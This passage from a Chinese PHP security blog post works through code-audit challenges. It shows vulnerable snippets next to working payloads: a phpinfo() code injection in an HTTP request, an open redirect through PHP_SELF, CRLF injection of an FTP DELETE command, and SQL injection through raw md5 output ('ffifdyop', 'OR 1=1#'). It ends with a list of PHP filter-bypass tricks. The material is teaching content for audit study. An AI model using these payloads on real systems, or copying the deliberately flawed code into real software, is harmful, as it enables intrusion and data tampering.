User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 34</p>
<p>weburl=&quot;;phpinfo();//&amp;token=</p>
<p>&lt;pre&gt;&lt;code class=&quot;line-numbers&quot;&gt;- 测试</p>
<p>![](https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513220531.png)</p>
<p>## $_SERVER[&#039;PHP_SELF&#039;]导致的防御失效问题</p>
<p>### Sleigh Ride</p>
<p>&#8211; code </p>
<p>&#8220;`php<br />
class Redirect {<br />
  private $websiteHost = &#8216;www.example.com&#8217;;</p>
<p>  private function setHeaders($url) {<br />
    $url = urldecode($url);<br />
    header(&#8220;Location: $url&#8221;);<br />
  }</p>
<p>  public function startRedirect($params) {<br />
    $parts = explode(&#8216;/&#8217;, $_SERVER[&#8216;PHP_SELF&#8217;]);<br />
    $baseFile = end($parts);<br />
    $url = sprintf(<br />
      &#8220;%s?%s&#8221;,<br />
      $baseFile,<br />
      http_build_query($params)<br />
    );<br />
    $this-&gt;setHeaders($url);<br />
  }<br />
}</p>
<p>if ($_GET[&#8216;redirect&#8217;]) {<br />
  (new Redirect())-&gt;startRedirect($_GET[&#8216;params&#8217;]);<br />
}<br />
</code></p>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200514095859.png" alt="" /></p>
<ul>
<li>题解</li>
</ul>
<p><em>代码实现的功能实则为一个URL跳转的功能，PHP_SELF 指当前的页面绝对地址。</em></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">/index.php/http:%252f%252fwww.syst1m.com?redirect=1
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><em>跳转到了我的博客</em><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200514101338.png" alt="" /></p>
<h2>深入理解$_REQUESTS数组</h2>
<h3>Poem</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class FTP {
  public $sock;

  public function __construct($host, $port, $user, $pass) {
    $this-&gt;sock = fsockopen($host, $port);

    $this-&gt;login($user, $pass);
    $this-&gt;cleanInput();
    $this-&gt;mode($_REQUEST['mode']);
    $this-&gt;send($_FILES['file']);
  }

  private function cleanInput() {
    $_GET = array_map('intval', $_GET);
    $_POST = array_map('intval', $_POST);
    $_COOKIE = array_map('intval', $_COOKIE);
  }

  public function login($username, $password) {
    fwrite($this-&gt;sock, "USER " . $username . "\n");
    fwrite($this-&gt;sock, "PASS " . $password . "\n");
  }

  public function mode($mode) {
    if ($mode == 1 || $mode == 2 || $mode == 3) {
      fputs($this-&gt;sock, "MODE $mode\n");
    }
  }

  public function send($data) {
    fputs($this-&gt;sock, $data);
  }
}

new FTP('localhost', 21, 'user', 'password');
</code></pre>
<ul>
<li>题解</li>
</ul>
<p><em>mode是通过request传进来的，在cleanInput方法中将get、post、cookie传进来的全部通过intval函数过滤</em></p>
<ul>
<li>REQUEST</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200514104553.png" alt="" /></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">?mode=1%0a%0dDELETE%20test.file 
</code></pre>
<h2>Raw MD5 Hash引发的注入</h2>
<h3>Turkey Baster</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class RealSecureLoginManager {
  private $em;
  private $user;
  private $password;

  public function __construct($user, $password) {
    $this-&gt;em = DoctrineManager::getEntityManager();
    $this-&gt;user = $user;
    $this-&gt;password = $password;
  }

  public function isValid() {
    $pass = md5($this-&gt;password, true);
    $user = $this-&gt;sanitizeInput($this-&gt;user);

    $queryBuilder = $this-&gt;em-&gt;createQueryBuilder()
      -&gt;select("COUNT(p)")
      -&gt;from("User", "u")
      -&gt;where("password = '$pass' AND user = '$user'");
    $query = $queryBuilder-&gt;getQuery();
    return boolval($query-&gt;getSingleScalarResult());
  }

  public function sanitizeInput($input) {
    return addslashes($input);
  }

  $c = new RealSecureLoginManager(
  $_POST['user'],
  $_POST['passwd']
);
if (!$auth-&gt;isValid()) {
  exit;
}
</code></pre>
<ul>
<li>md5(计算字符串的 MD5 散列值)</li>
</ul>
<pre><code class="language-php line-numbers">string md5 ( string $str [, bool $raw_output = false ] )
</code></pre>
<ul>
<li>题解</li>
</ul>
<p><em>auth新建了一个RealSecureLoginManager对象，传进去POST的user和passwd。在md5方法中，如果可选的 raw_output 被设置为 TRUE，那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。</em></p>
<ul>
<li>fuzz</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200514111159.png" alt="" /></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-SQL line-numbers">user= OR 1=1#&amp;passwd=128
</code></pre>
<ul>
<li>SQL</li>
</ul>
<pre><code class="language-SQL line-numbers">select count(p) from user s where password='v�a�n���l���q��\' and user=' OR 1=1#'
</code></pre>
<h3>实例分析</h3>
<ul>
<li>题目地址</li>
</ul>
<pre><code class="line-numbers">http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
</code></pre>
<h3>分析</h3>
<ul>
<li>查看源代码</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200514111818.png" alt="" /></p>
<ul>
<li>password</li>
</ul>
<pre><code class="language-php line-numbers">md5($password,true)
</code></pre>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-php line-numbers">password=ffifdyop或者129581926211651571912466741651878684928
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200514112614.png" alt="" /></p>
<h2>Tips整理</h2>
<ul>
<li>in_array</li>
</ul>
<pre><code class="line-numbers">第三个参数未设置为true,可利用弱类型比较绕过
</code></pre>
<ul>
<li>filter_var（url过滤）</li>
</ul>
<pre><code class="line-numbers">未对协议进行校验，可利用xxx://绕过
</code></pre>
<ul>
<li>class_exists</li>
</ul>
<pre><code class="line-numbers">当存在__autoload函数，会自动调用，如果类名可控，可造成危害，如果参数也可控，可利用内部函数进行攻击。
</code></pre>
<ul>
<li>strpos</li>
</ul>
<pre><code class="line-numbers">strpos在没找到指定字符时会返回flase，如果第一个字符找到就返回0
</code></pre>
<ul>
<li>filter_var (FILTER_VALIDATE_EMAIL)</li>
</ul>
<pre><code class="line-numbers">filter_var() 问题在于，我们在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因，我们通过重叠单引号和双引号，欺骗 filter_val() 使其认为我们仍然在双引号中，这样我们就可以绕过检测。
”aaa’aaa”@example.com
</code></pre>
<ul>
<li>escapeshellarg与escapeshellcmd</li>
</ul>
<pre><code class="line-numbers">escapeshellarg与escapeshellcmd配合使用会存在绕过
</code></pre>
<ul>
<li>parse_str</li>
</ul>
<pre><code class="line-numbers">parse_str的作用就是解析字符串并且注册成变量，它在注册变量之前不会验证当前变量是否存在，所以会直接覆盖掉当前作用域中原有的变量
</code></pre>
<ul>
<li>preg_replace</li>
</ul>
<pre><code class="line-numbers">$pattern 存在 /e 模式修正符，允许代码执行
/e 模式修正符，是 preg_replace() 将 $replacement 当做php代码来执行
</code></pre>
<ul>
<li>extract</li>
</ul>
<pre><code class="line-numbers">从数组中将变量导入到当前的符号表
</code></pre>
<ul>
<li>readfile</li>
</ul>
<pre><code class="line-numbers">可利用 ../http/../../ 跳过目录（如检测关键字https是否存在）
</code></pre>
<ul>
<li>截断</li>
</ul>
<pre><code class="line-numbers">%00 遇到遇到函数过滤会成为\0
</code></pre>
<ul>
<li>反序列化</li>
</ul>
<p><a class="wp-editor-md-post-content-link" href="https://syst1m.com/post/php-deserialization/">PHP 反序列化漏洞学习</a></p>
<ul>
<li>htmlentities</li>
</ul>
<pre><code class="line-numbers">将字符转换为 HTML 转义字符
</code></pre>
<p><em>ENT_COMPAT（默认值）：只转换双引号。<br />
ENT_QUOTES：两种引号都转换。<br />
ENT_NOQUOTES：两种引号都不转换。</em></p>
<ul>
<li>$_SERVER[&#8216;REQUEST_URI&#8217;]</li>
</ul>
<pre><code class="line-numbers">获取的参数是不会将参数中的特殊符号进行转换
</code></pre>
<ul>
<li>HPP</li>
</ul>
<pre><code class="line-numbers">id=1&amp;id=2 只会接收第二个参数
</code></pre>
<ul>
<li>md5(计算字符串的 MD5 散列值)</li>
</ul>
<pre><code class="line-numbers">string md5 ( string $str [, bool $raw_output = false ] )
</code></pre>
<p><em>在md5方法中，如果可选的 raw_output 被设置为 TRUE，那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。</em></p>
<ul>
<li>eregi截断漏洞</li>
</ul>
<p><em>ereg可用%00截断,要求php&lt;5.3.4</em></p>
<pre><code class="line-numbers">ereg编码%00时发生截断,不会检查%00后面的字符(%00算作1个字符)
</code></pre>
<ul>
<li>ssrf</li>
</ul>
<p><a class="wp-editor-md-post-content-link" href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf"> us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
